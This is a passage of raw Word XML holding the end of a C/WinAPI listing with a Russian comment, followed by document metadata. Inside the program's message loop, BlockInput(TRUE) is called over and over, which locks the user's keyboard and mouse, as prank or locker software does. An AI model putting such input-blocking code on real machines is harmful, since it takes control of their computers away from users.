          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>MSG</w:t>
      </w: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Msg = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4234D3FA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</w:p>
    <w:p w14:paraId="7FB50059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008000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>// Запускаем цикл обработки сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB511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 xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while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(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GetMessage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(&amp;Msg,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NULL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, 0, 0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1C108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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117312A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   BlockInput(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TRUE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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5E942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   TranslateMessage(&amp;Msg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10924A04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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DispatchMessage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>(&amp;Msg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E4867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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C862A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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3BE92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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56429B30" w14:textId="77777777" w:rsidR="00A3476E" w:rsidRPr="00A3476E" w:rsidRDefault="00A3476E" w:rsidP="00A347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highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB7085" w14:textId="54486A76" w:rsidR="00933E0D" w:rsidRPr="00280D47" w:rsidRDefault="00A3476E" w:rsidP="00A3476E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB01343" w14:textId="77777777" w:rsidR="00C8737B" w:rsidRPr="00280D47" w:rsidRDefault="00C8737B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C8737B" w:rsidRPr="00280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6C45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B19E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F5EC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9B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750DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A126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C3BF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA0A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67ED5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FCA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07033">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1106999981">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2901682">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="965432698">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="13502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94"/>
    <w:rsid w:val="00280D47"/>
    <w:rsid w:val="002A5153"/>
    <w:rsid w:val="003B072E"/>
    <w:rsid w:val="005056CB"/>
    <w:rsid w:val="00735A45"/>
    <w:rsid w:val="008164B5"/>
    <w:rsid w:val="00933E0D"/>
    <w:rsid w:val="00A3476E"/>
    <w:rsid w:val="00AF20F4"/>
    <w:rsid w:val="00BE086F"/>
    <w:rsid w:val="00C8737B"/>
    <w:rsid w:val="00DE4D94"/>
    <w:rsid w:val="00F82E67"/>
    <w:rsid w:val="00FC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B6A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{521A3B93-865F-42AF-9ECE-31E720AA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4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4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4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4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4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4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4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4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4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4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4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4D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4D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4D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4D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4D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4D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4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4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4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4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4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4D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4D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4D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4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4D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4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starmarker10@mail.ru</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>starmarker10@mail.ru</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-26T09:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-01T16:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>